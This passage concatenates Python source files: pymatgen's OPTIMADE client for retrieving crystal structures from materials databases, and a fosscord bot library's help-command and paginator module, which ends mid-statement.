exc_tb): """ Support for "with" context. """ self.session.close()
""" Optimade support. """ import logging import sys from collections import namedtuple from os.path import join from typing import Dict, Union, List, Optional from urllib.parse import urlparse import requests #from retrying import retry from pymatgen.core.periodic_table import DummySpecies from pymatgen.core.structure import Structure from pymatgen.util.provenance import StructureNL from pymatgen.util.sequence import PBar # TODO: importing optimade-python-tool's data structures will make more sense Provider = namedtuple("Provider", ["name", "base_url", "description", "homepage", "prefix"]) _logger = logging.getLogger(__name__) _handler = logging.StreamHandler(sys.stdout) _logger.addHandler(_handler) _logger.setLevel(logging.WARNING) class OptimadeRester: """ Class to call OPTIMADE-compliant APIs, see optimade.org This class is ready to use but considered in-development and subject to change until the OPTIMADE paper is published. """ # regenerate on-demand from official providers.json using OptimadeRester.refresh_aliases() # these aliases are provided as a convenient shortcut for users of the OptimadeRester class aliases = { "aflow": "http://aflow.org/API/optimade/", "cod": "https://www.crystallography.net/cod/optimade", "mcloud.2dstructures": "https://aiida.materialscloud.org/2dstructures/optimade", "mcloud.2dtopo": "https://aiida.materialscloud.org/2dtopo/optimade", "mcloud.curated-cofs": "https://aiida.materialscloud.org/curated-cofs/optimade", "mcloud.li-ion-conductors": "https://aiida.materialscloud.org/li-ion-conductors/optimade", "mcloud.optimade-sample": "https://aiida.materialscloud.org/optimade-sample/optimade", "mcloud.pyrene-mofs": "https://aiida.materialscloud.org/pyrene-mofs/optimade", "mcloud.scdm": "https://aiida.materialscloud.org/autowannier/optimade", "mcloud.sssp": "https://aiida.materialscloud.org/sssplibrary/optimade", "mcloud.stoceriaitf": "https://aiida.materialscloud.org/stoceriaitf/optimade", "mcloud.tc-applicability": "https://aiida.materialscloud.org/tc-applicability/optimade", "mcloud.threedd": "https://aiida.materialscloud.org/3dd/optimade", "mp": "https://optimade.materialsproject.org", "mpds": "https://api.mpds.io", "nmd": "https://nomad-lab.eu/prod/rae/optimade/", "odbx": "https://optimade.odbx.science", "omdb.omdb_production": "http://optimade.openmaterialsdb.se", "oqmd": "http://oqmd.org/optimade/", "tcod": "https://www.crystallography.net/tcod/optimade", } def __init__(self, aliases_or_resource_urls: Optional[Union[str, List[str]]] = None, timeout=5): """ OPTIMADE is an effort to provide a standardized interface to retrieve information from many different materials science databases. This is a client to retrieve structures from OPTIMADE v1 compliant endpoints. It does not yet support all features of the OPTIMADE v1 specification but is intended as a way to quickly search an endpoint in a way familiar to users of pymatgen without needing to know the full OPTIMADE specification. For advanced usage, please see the OPTIMADE documentation at optimade.org and consider calling the APIs directly. For convenience, known OPTIMADE endpoints have been given aliases in pymatgen to save typing the full URL. The current list of aliases is: aflow, cod, mcloud.sssp, mcloud.2dstructures, mcloud.2dtopo, mcloud.tc-applicability, mcloud.threedd, mcloud.scdm, mcloud.curated-cofs, mcloud.optimade-sample, mcloud.stoceriaitf, mcloud.pyrene-mofs, mcloud.li-ion-conductors, mp, odbx, omdb.omdb_production, oqmd, tcod To refresh this list of aliases, generated from the current list of OPTIMADE providers at optimade.org, call the refresh_aliases() method. Args: aliases_or_resource_urls: the alias or structure resource URL or a list of aliases or resource URLs, if providing the resource URL directly it should not be an index, this interface can only currently access the "v1/structures" information from the specified resource URL timeout: number of seconds before an attempted request is abandoned, a good timeout is useful when querying many providers, some of which may be offline """ # TODO: maybe we should use the nice pydantic models from optimade-python-tools # for response validation, and use the Lark parser for filter validation self.session = requests.Session() self._timeout = timeout # seconds if isinstance(aliases_or_resource_urls, str): aliases_or_resource_urls = [aliases_or_resource_urls] # this stores a dictionary with keys provider id (in the same format as the aliases) # and values as the corresponding URL self.resources = {} if not aliases_or_resource_urls: aliases_or_resource_urls = list(self.aliases.keys()) _logger.warning( "Connecting to all known OPTIMADE providers, this will be slow. Please connect to only the " f"OPTIMADE providers you want to query. Choose from: {', '.join(self.aliases.keys())}" ) for alias_or_resource_url in aliases_or_resource_urls: if alias_or_resource_url in self.aliases: self.resources[alias_or_resource_url] = self.aliases[alias_or_resource_url] elif self._validate_provider(alias_or_resource_url): # TODO: unclear what the key should be here, the "prefix" is for the root provider, # may need to walk back to the index for the given provider to find the correct identifier self.resources[alias_or_resource_url] = alias_or_resource_url else: _logger.error(f"The following is not a known alias or a valid url: {alias_or_resource_url}") self._providers = {url: self._validate_provider(provider_url=url) for url in self.resources.values()} def __repr__(self): return f"OptimadeRester connected to: {', '.join(self.resources.values())}" def __str__(self): return self.describe() def describe(self): """ Provides human-readable information about the resources being searched by the OptimadeRester. """ provider_text = "\n".join(map(str, (provider for provider in self._providers.values() if provider))) description = f"OptimadeRester connected to:\n{provider_text}" return description #@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=2000) def _get_json(self, url): """ Retrieves JSON, will attempt to (politely) try again on failure subject to a random delay and a maximum number of attempts. """ return self.session.get(url, timeout=self._timeout).json() @staticmethod def _build_filter( elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None ): """ Convenience method to build an OPTIMADE filter. """ filters = [] if elements: if isinstance(elements, str): elements = [elements] elements_str = ", ".join([f'"{el}"' for el in elements]) filters.append(f"(elements HAS ALL {elements_str})") if nsites: if isinstance(nsites, (list, tuple)): filters.append(f"(nsites>={min(nsites)} AND nsites<={max(nsites)})") else: filters.append(f"(nsites={int(nsites)})") if nelements: if isinstance(nelements, (list, tuple)): filters.append(f"(nelements>={min(nelements)} AND nelements<={max(nelements)})") else: filters.append(f"(nelements={int(nelements)})") if chemical_formula_anonymous: filters.append(f'(chemical_formula_anonymous="{chemical_formula_anonymous}")') if chemical_formula_hill: filters.append(f'(chemical_formula_hill="{chemical_formula_anonymous}")') return " AND ".join(filters) def get_structures( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, Structure]]: """ Retrieve Structures from OPTIMADE providers. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict Structures keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_structures_with_filter(optimade_filter) def get_snls( self, elements=None, nelements=None, nsites=None, chemical_formula_anonymous=None, chemical_formula_hill=None, ) -> Dict[str, Dict[str, StructureNL]]: """ Retrieve StructureNL from OPTIMADE providers. A StructureNL is an object provided by pymatgen which combines Structure with associated metadata, such as the URL is was downloaded from and any additional namespaced data. Not all functionality of OPTIMADE is currently exposed in this convenience method. To use a custom filter, call get_structures_with_filter(). Args: elements: List of elements nelements: Number of elements, e.g. 4 or [2, 5] for the range >=2 and <=5 nsites: Number of sites, e.g. 4 or [2, 5] for the range >=2 and <=5 chemical_formula_anonymous: Anonymous chemical formula chemical_formula_hill: Chemical formula following Hill convention Returns: Dict of (Dict of StructureNLs keyed by that database's id system) keyed by provider """ optimade_filter = self._build_filter( elements=elements, nelements=nelements, nsites=nsites, chemical_formula_anonymous=chemical_formula_anonymous, chemical_formula_hill=chemical_formula_hill, ) return self.get_snls_with_filter(optimade_filter) def get_structures_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, Structure]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = self.get_snls_with_filter(optimade_filter) all_structures = {} for identifier, snls_dict in all_snls.items(): all_structures[identifier] = {k: snl.structure for k, snl in snls_dict.items()} return all_structures def get_snls_with_filter(self, optimade_filter: str) -> Dict[str, Dict[str, StructureNL]]: """ Get structures satisfying a given OPTIMADE filter. Args: filter: An OPTIMADE-compliant filter Returns: Dict of Structures keyed by that database's id system """ all_snls = {} for identifier, resource in self.resources.items(): fields = "response_fields=lattice_vectors,cartesian_site_positions,species,species_at_sites" url = join(resource, f"v1/structures?filter={optimade_filter}&fields={fields}") try: json = self._get_json(url) structures = self._get_snls_from_resource(json, url, identifier) pbar = PBar(total=json["meta"].get("data_returned", 0), desc=identifier, initial=len(structures)) # TODO: check spec for `more_data_available` boolean, may simplify this conditional if ("links" in json) and ("next" in json["links"]) and (json["links"]["next"]): while "next" in json["links"] and json["links"]["next"]: next_link = json["links"]["next"] if isinstance(next_link, dict) and "href" in next_link: next_link = next_link["href"] json = self._get_json(next_link) additional_structures = self._get_snls_from_resource(json, url, identifier) structures.update(additional_structures) pbar.update(len(additional_structures)) if structures: all_snls[identifier] = structures except Exception as exc: # TODO: manually inspect failures to either (a) correct a bug or (b) raise more appropriate error _logger.error( f"Could not retrieve required information from provider {identifier} and url {url}: {exc}" ) return all_snls @staticmethod def _get_snls_from_resource(json, url, identifier) -> Dict[str, StructureNL]: snls = {} exceptions = set() def _sanitize_symbol(symbol): if symbol == "vacancy": symbol = DummySpecies("X_vacancy", oxidation_state=None) elif symbol == "X": symbol = DummySpecies("X", oxidation_state=None) return symbol def _get_comp(sp_dict): return { _sanitize_symbol(symbol): conc for symbol, conc in zip(sp_dict["chemical_symbols"], sp_dict["concentration"]) } for data in json["data"]: # TODO: check the spec! and remove this try/except (are all providers following spec?) # e.g. can check data["type"] == "structures" try: # e.g. COD structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=[_get_comp(d) for d in data["attributes"]["species"]], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data.items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl # TODO: bare exception, remove... except Exception: try: # e.g. MP (all ordered, no vacancies) structure = Structure( lattice=data["attributes"]["lattice_vectors"], species=data["attributes"]["species_at_sites"], coords=data["attributes"]["cartesian_site_positions"], coords_are_cartesian=True, ) namespaced_data = {k: v for k, v in data["attributes"].items() if k.startswith("_")} # TODO: follow `references` to add reference information here snl = StructureNL( structure, authors={}, history=[{"name": identifier, "url": url, "description": {"id": data["id"]}}], data={"_optimade": namespaced_data}, ) snls[data["id"]] = snl except Exception as exc: if str(exc) not in exceptions: exceptions.add(str(exc)) if exceptions: _logger.error(f'Failed to parse returned data for {url}: {", ".join(exceptions)}') return snls def _validate_provider(self, provider_url) -> Optional[Provider]: """ Checks that a given URL is indeed an OPTIMADE provider, returning None if it is not a provider, or the provider prefix if it is. TODO: careful reading of OPTIMADE specification required TODO: add better exception handling, intentionally permissive currently """ def is_url(url): """ Basic URL validation thanks to https://stackoverflow.com/a/52455972 """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False if not is_url(provider_url): _logger.warning(f"An invalid url was supplied: {provider_url}") return None try: url = join(provider_url, "v1/info") provider_info_json = self._get_json(url) except Exception as exc: _logger.warning(f"Failed to parse {url} when validating: {exc}") return None try: return Provider( name=provider_info_json["meta"].get("provider", {}).get("name", "Unknown"), base_url=provider_url, description=provider_info_json["meta"].get("provider", {}).get("description", "Unknown"), homepage=provider_info_json["meta"].get("provider", {}).get("homepage"), prefix=provider_info_json["meta"].get("provider", {}).get("prefix", "Unknown"), ) except Exception as exc: _logger.warning(f"Failed to extract required information from {url}: {exc}") return None def _parse_provider(self, provider, provider_url) -> Dict[str, Provider]: """ Used internally to update the list of providers or to check a given URL is valid. It does not raise exceptions but will instead _logger.warning and provide an empty dictionary in the case of invalid data. In future, when the specification is sufficiently well adopted, we might be more strict here. Args: provider: the provider prefix provider_url: An OPTIMADE provider URL Returns: A dictionary of keys (in format of "provider.database") to Provider objects. """ try: url = join(provider_url, "v1/links") provider_link_json = self._get_json(url) except Exception as exc: _logger.error(f"Failed to parse {url} when following links: {exc}") return {} def _parse_provider_link(provider, provider_link_json): """No validation attempted.""" ps = {} try: d = [d for d in provider_link_json["data"] if d["attributes"]["link_type"] == "child"] for link in d: key = f"{provider}.{link['id']}" if provider != link["id"] else provider if link["attributes"]["base_url"]: ps[key] = Provider( name=link["attributes"]["name"], base_url=link["attributes"]["base_url"], description=link["attributes"]["description"], homepage=link["attributes"].get("homepage"), prefix=link["attributes"].get("prefix"), ) except Exception: # print(f"Failed to parse {provider}: {exc}") # Not all providers parse yet. pass return ps return _parse_provider_link(provider, provider_link_json) def refresh_aliases(self, providers_url="https://providers.optimade.org/providers.json"): """ Updates available OPTIMADE structure resources based on the current list of OPTIMADE providers. """ json = self._get_json(providers_url) providers_from_url = { entry["id"]: entry["attributes"]["base_url"] for entry in json["data"] if entry["attributes"]["base_url"] } structure_providers = {} for provider, provider_link in providers_from_url.items(): structure_providers.update(self._parse_provider(provider, provider_link)) self.aliases = {alias: provider.base_url for alias, provider in structure_providers.items()} # TODO: revisit context manager logic here and in MPRester def __enter__(self): """ Support for "with" context. """ return self def __exit__(self, exc_type, exc_val, exc_tb): """ Support for "with" context. """ self.session.close()
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import copy import functools import inspect import re from typing import Optional, TYPE_CHECKING import fosscord.utils from .core import Group, Command from .errors import CommandError if TYPE_CHECKING: from .context import Context __all__ = ( 'Paginator', 'HelpCommand', 'DefaultHelpCommand', 'MinimalHelpCommand', ) # help -> shows info of bot on top/bottom and lists subcommands # help command -> shows detailed info of command # help command <subcommand chain> -> same as above # <description> # <command signature with aliases> # <long doc> # Cog: # <command> <shortdoc> # <command> <shortdoc> # Other Cog: # <command> <shortdoc> # No Category: # <command> <shortdoc> # Type <prefix>help command for more info on a command. # You can also type <prefix>help category for more info on a category. class Paginator: """A class that aids in paginating code blocks for Fosscord messages. .. container:: operations .. describe:: len(x) Returns the total number of characters in the paginator. Attributes ----------- prefix: :class:`str` The prefix inserted to every page. e.g. three backticks. suffix: :class:`str` The suffix appended at the end of every page. e.g. three backticks. max_size: :class:`int` The maximum amount of codepoints allowed in a page. linesep: :class:`str` The character string inserted between lines. e.g. a newline character. .. versionadded:: 1.7 """ def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'): self.prefix = prefix self.suffix = suffix self.max_size = max_size self.linesep = linesep self.clear() def clear(self): """Clears the paginator to have no pages.""" if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + newline else: self._current_page = [] self._count = 0 self._pages = [] @property def _prefix_len(self): return len(self.prefix) if self.prefix else 0 @property def _suffix_len(self): return len(self.suffix) if self.suffix else 0 @property def _linesep_len(self): return len(self.linesep) def add_line(self, line='', *, empty=False): """Adds a line to the current page. If the line exceeds the :attr:`max_size` then an exception is raised. Parameters ----------- line: :class:`str` The line to add. empty: :class:`bool` Indicates if another empty line should be added. Raises ------ RuntimeError The line was too big for the current :attr:`max_size`. """ max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len if len(line) > max_page_size: raise RuntimeError(f'Line exceeds maximum page size {max_page_size}') if self._count + len(line) + self._linesep_len > self.max_size - self._suffix_len: self.close_page() self._count += len(line) + self._linesep_len self._current_page.append(line) if empty: self._current_page.append('') self._count += self._linesep_len def close_page(self): """Prematurely terminate a page.""" if self.suffix is not None: self._current_page.append(self.suffix) self._pages.append(self.linesep.join(self._current_page)) if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + linesep else: self._current_page = [] self._count = 0 def __len__(self): total = sum(len(p) for p in self._pages) return total + self._count @property def pages(self): """List[:class:`str`]: Returns the rendered list of pages.""" # we have more than just the prefix in our current page if len(self._current_page) > (0 if self.prefix is None else 1): self.close_page() return self._pages def __repr__(self): fmt = '<Paginator prefix: {0.prefix!r} suffix: {0.suffix!r} linesep: {0.linesep!r} max_size: {0.max_size} count: {0._count}>' return fmt.format(self) def _not_overriden(f): f.__help_command_not_overriden__ = True return f class _HelpCommandImpl(Command): def __init__(self, inject, *args, **kwargs): super().__init__(inject.command_callback, *args, **kwargs) self._original = inject self._injected = inject async def prepare(self, ctx): self._injected = injected = self._original.copy() injected.context = ctx self.callback = injected.command_callback on_error = injected.on_help_command_error if not hasattr(on_error, '__help_command_not_overriden__'): if self.cog is not None: self.on_error = self._on_error_cog_implementation else: self.on_error = on_error await super().prepare(ctx) async def _parse_arguments(self, ctx): # Make the parser think we don't have a cog so it doesn't # inject the parameter into `ctx.args`. original_cog = self.cog self.cog = None try: await super()._parse_arguments(ctx) finally: self.cog = original_cog async def _on_error_cog_implementation(self, dummy, ctx, error): await self._injected.on_help_command_error(ctx, error) @property def clean_params(self): result = self.params.copy() try: del result[next(iter(result))] except StopIteration: raise ValueError('Missing context parameter') from None else: return result def _inject_into_cog(self, cog): # Warning: hacky # Make the cog think that get_commands returns this command # as well if we inject it without modifying __cog_commands__ # since that's used for the injection and ejection of cogs. def wrapped_get_commands(*, _original=cog.get_commands): ret = _original() ret.append(self) return ret # Ditto here def wrapped_walk_commands(*, _original=cog.walk_commands): yield from _original() yield self functools.update_wrapper(wrapped_get_commands, cog.get_commands) functools.update_wrapper(wrapped_walk_commands, cog.walk_commands) cog.get_commands = wrapped_get_commands cog.walk_commands = wrapped_walk_commands self.cog = cog def _eject_cog(self): if self.cog is None: return # revert back into their original methods cog = self.cog cog.get_commands = cog.get_commands.__wrapped__ cog.walk_commands = cog.walk_commands.__wrapped__ self.cog = None class HelpCommand: r"""The base implementation for help command formatting. .. note:: Internally instances of this class are deep copied every time the command itself is invoked to prevent a race condition mentioned in :issue:`2123`. This means that relying on the state of this class to be the same between command invocations would not work as expected. Attributes ------------ context: Optional[:class:`Context`] The context that invoked this help formatter. This is generally set after the help command assigned, :func:`command_callback`\, has been called. show_hidden: :class:`bool` Specifies if hidden commands should be shown in the output. Defaults to ``False``. verify_checks: Optional[:class:`bool`] Specifies if commands should have their :attr:`.Command.checks` called and verified. If ``True``, always calls :attr:`.Command.checks`. If ``None``, only calls :attr:`.Command.checks` in a guild setting. If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``. .. versionchanged:: 1.7 command_attrs: :class:`dict` A dictionary of options to pass in for the construction of the help command. This allows you to change the command behaviour without actually changing the implementation of the command. The attributes will be the same as the ones passed in the :class:`.Command` constructor. """ MENTION_TRANSFORMS = { '@everyone': '@\u200beveryone', '@here': '@\u200bhere', r'<@!?[0-9]{17,22}>': '@deleted-user', r'<@&[0-9]{17,22}>': '@deleted-role', } MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys())) def __new__(cls, *args, **kwargs): # To prevent race conditions of a single instance while also allowing # for settings to be passed the original arguments passed must be assigned # to allow for easier copies (which will be made when the help command is actually called) # see issue 2123 self = super().__new__(cls) # Shallow copies cannot be used in this case since it is not unusual to pass # instances that need state, e.g. Paginator or what have you into the function # The keys can be safely copied as-is since they're 99.99% certain of being # string keys deepcopy = copy.deepcopy self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()} self.__original_args__ = deepcopy(args) return self def __init__(self, **options): self.show_hidden = options.pop('show_hidden', False) self.verify_checks = options.pop('verify_checks', True) self.command_attrs = attrs = options.pop('command_attrs', {}) attrs.setdefault('name', 'help') attrs.setdefault('help', 'Shows this message') self.context: Context = fosscord.utils.MISSING self._command_impl = _HelpCommandImpl(self, **self.command_attrs) def copy(self): obj = self.__class__(*self.__original_args__, **self.__original_kwargs__) obj._command_impl = self._command_impl return obj def _add_to_bot(self, bot): command = _HelpCommandImpl(self, **self.command_attrs) bot.add_command(command) self._command_impl = command def _remove_from_bot(self, bot): bot.remove_command(self._command_impl.name) self._command_impl._eject_cog() def add_check(self, func): """ Adds a check to the help command. .. versionadded:: 1.4 Parameters ---------- func The function that will be used as a check. """ self._command_impl.add_check(func) def remove_check(self, func): """ Removes a check from the help command. This function is idempotent and will not raise an exception if the function is not in the command's checks. .. versionadded:: 1.4 Parameters ---------- func The function to remove from the checks. """ self._command_impl.remove_check(func) def get_bot_mapping(self): """Retrieves the bot mapping passed to :meth:`send_bot_help`.""" bot = self.context.bot mapping = {cog: cog.get_commands() for cog in bot.cogs.values()} mapping[None] = [c for c in bot.commands if c.cog is None] return mapping @property def invoked_with(self): """Similar to :attr:`Context.invoked_with` except properly handles the case where :meth:`Context.send_help` is used. If the help command was used regularly then this returns the :attr:`Context.invoked_with` attribute. Otherwise, if it the help command was called using :meth:`Context.send_help` then it returns the internal command name of the help command. Returns --------- :class:`str` The command name that triggered this invocation. """ command_name = self._command_impl.name ctx = self.context if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name: return command_name return ctx.invoked_with def get_command_signature(self, command): """Retrieves the signature portion of the help page. Parameters ------------ command: :class:`Command` The command to get the signature of. Returns -------- :class:`str` The signature for the command. """ parent = command.parent entries = [] while parent is not None: if not parent.signature or parent.invoke_without_command: entries.append(parent.name) else: entries.append(parent.name + ' ' + parent.signature) parent = parent.parent parent_sig = ' '.join(reversed(entries)) if len(command.aliases) > 0: aliases = '|'.join(command.aliases) fmt = f'[{command.name}|{aliases}]' if parent_sig: fmt = parent_sig + ' ' + fmt alias = fmt else: alias = command.name if not parent_sig else parent_sig + ' ' + command.name return f'{self.context.clean_prefix}{alias} {command.signature}' def remove_mentions(self, string): """Removes mentions from the string to prevent abuse. This includes ``@everyone``, ``@here``, member mentions and role mentions. Returns ------- :class:`str` The string with mentions removed. """ def replace(obj, *, transforms=self.MENTION_TRANSFORMS): return transforms.get(obj.group(0), '@invalid') return self.MENTION_PATTERN.sub(replace, string) @property def cog(self): """A property for retrieving or setting the cog for the help command. When a cog is set for the help command, it is as-if the help command belongs to that cog. All cog special methods will apply to the help command and it will be automatically unset on unload. To unbind the cog from the help command, you can set it to ``None``. Returns -------- Optional[:class:`Cog`] The cog that is currently set for the help command. """ return self._command_impl.cog @cog.setter def cog(self, cog): # Remove whatever cog is currently valid, if any self._command_impl._eject_cog() # If a new cog is set then inject it. if cog is not None: self._command_impl._inject_into_cog(cog) def command_not_found(self, string): """|maybecoro| A method called when a command is not found in the help command. This is useful to override for i18n. Defaults to ``No command called {0} found.`` Parameters ------------ string: :class:`str` The string that contains the invalid command. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when a command has not been found. """ return f'No command called "{string}" found.' def subcommand_not_found(self, command, string): """|maybecoro| A method called when a command did not have a subcommand requested in the help command. This is useful to override for i18n. Defaults to either: - ``'Command "{command.qualified_name}" has no subcommands.'`` - If there is no subcommand in the ``command`` parameter. - ``'Command "{command.qualified_name}" has no subcommand named {string}'`` - If the ``command`` parameter has subcommands but not one named ``string``. Parameters ------------ command: :class:`Command` The command that did not have the subcommand requested. string: :class:`str` The string that contains the invalid subcommand. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when the command did not have the subcommand requested. """ if isinstance(command, Group) and len(command.all_commands) > 0: return f'Command "{command.qualified_name}" has no subcommand named {string}' return f'Command "{command.qualified_name}" has no subcommands.' async def filter_commands(self, commands, *, sort=False, key=None): """|coro| Returns a filtered list of commands and optionally sorts them. This takes into account the :attr:`verify_checks` and :attr:`show_hidden` attributes. Parameters ------------ commands: Iterable[:class:`Command`] An iterable of commands that are getting filtered. sort: :class:`bool` Whether to sort the result. key: Optional[Callable[:class:`Command`, Any]] An optional key function to pass to :func:`py:sorted` that takes a :class:`Command` as its sole parameter. If ``sort`` is passed as ``True`` then this will default as the command name. Returns --------- List[:class:`Command`] A list of commands that passed the filter. """ if sort and key is None: key = lambda c: c.name iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands) if self.verify_checks is False: # if we do not need to verify the checks then we can just # run it straight through normally without using await. return sorted(iterator, key=key) if sort else list(iterator) if self.verify_checks is None and not self.context.guild: # if verify_checks is None and we're in a DM, don't verify return sorted(iterator, key=key) if sort else list(iterator) # if we're here then we need to check every command if it can run async def predicate(cmd): try: return await cmd.can_run(self.context) except CommandError: return False ret = [] for cmd in iterator: valid = await predicate(cmd) if valid: ret.append(cmd) if sort: ret.sort(key=key) return ret def get_max_size(self, commands): """Returns the largest name length of the specified command list. Parameters ------------ commands: Sequence[:class:`Command`] A sequence of commands to check for the largest size. Returns -------- :class:`int` The maximum width of the commands. """ as_lengths = (fosscord.utils._string_width(c.name) for c in commands) return max(as_lengths, default=0) def get_destination(self): """Returns the :class:`~fosscord.abc.Messageable` where the help command will be output. You can override this method to customise the behaviour. By default this returns the context's channel. Returns ------- :class:`.abc.Messageable` The destination where the help command will be output. """ return self.context.channel async def send_error_message(self, error): """|coro| Handles the implementation when an error happens in the help command. For example, the result of :meth:`command_not_found` will be passed here. You can override this method to customise the behaviour. By default, this sends the error message to the destination specified by :meth:`get_destination`. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. Parameters ------------ error: :class:`str` The error message to display to the user. Note that this has had mentions removed to prevent abuse. """ destination = self.get_destination() await destination.send(error) @_not_overriden async def on_help_command_error(self, ctx, error): """|coro| The help command's error handler, as specified by :ref:`ext_commands_error_handler`. Useful to override if you need some specific behaviour when the error handler is called. By default this method does nothing and just propagates to the default error handlers. Parameters ------------ ctx: :class:`Context` The invocation context. error: :class:`CommandError` The error that was raised. """ pass async def send_bot_help(self, mapping): """|coro| Handles the implementation of the bot command page in the help command. This function is called when the help command is called with no arguments. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. Also, the commands in the mapping are not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ------------ mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]] A mapping of cogs to commands that have been requested by the user for help. The key of the mapping is the :class:`~.commands.Cog` that the command belongs to, or ``None`` if there isn't one, and the value is a list of commands that belongs to that cog. """ return None async def send_cog_help(self, cog): """|coro| Handles the implementation of the cog page in the help command. This function is called when the help command is called with a cog as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this cog see :meth:`Cog.get_commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- cog: :class:`Cog` The cog that was requested for help. """ return None async def send_group_help(self, group): """|coro| Handles the implementation of the group page in the help command. This function is called when the help command is called with a group as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this group without aliases see :attr:`Group.commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- group: :class:`Group` The group that was requested for help. """ return None async def send_command_help(self, command): """|coro| Handles the implementation of the single command page in the help command. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. .. admonition:: Showing Help :class: helpful There are certain attributes and methods that are helpful for a help command to show such as the following: - :attr:`Command.help` - :attr:`Command.brief` - :attr:`Command.short_doc` - :attr:`Command.description` - :meth:`get_command_signature` There are more than just these attributes but feel free to play around with these to help you get started to get the output that you want. Parameters ----------- command: :class:`Command` The command that was requested for help. """ return None async def prepare_help_command(self, ctx, command=None): """|coro| A low level method that can be used to prepare the help command before it does anything. For example, if you need to prepare some state in your subclass before the command does its processing then this would be the place to do it. The default implementation does nothing. .. note:: This is called *inside* the help command callback body. So all the usual rules that happen inside apply here as well. Parameters ----------- ctx: :class:`Context` The invocation context. command: Optional[:class:`str`] The argument passed to the help command. """ pass async def command_callback(self, ctx, *, command=None): """|coro| The actual implementation of the help command. It is not recommended to override this method and instead change the behaviour through the methods that actually get dispatched. - :meth:`send_bot_help` - :meth:`send_cog_help` - :meth:`send_group_help` - :meth:`send_command_help` - :meth:`get_destination` - :meth:`command_not_found` - :meth:`subcommand_not_found` - :meth:`send_error_message` - :meth:`on_help_command_error` - :meth:`prepare_help_command` """ await self.prepare_help_command(ctx, command) bot = ctx.bot if command is None: mapping = self.get_bot_mapping() return await self.send_bot_help(mapping) # Check if it's a cog cog = bot.get_cog(command) if cog is not None: return await self.send_cog_help(cog) maybe_coro = fosscord.utils.maybe_coroutine # If it's not a cog then it's a command. # Since we want to have detailed errors when someone # passes an invalid subcommand, we need to walk through # the command group chain ourselves. keys = command.split(' ') cmd = bot.all_commands.get(keys[0]) if cmd is None: string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0])) return await self.send_error_message(string) for key in keys[1:]: try: found = 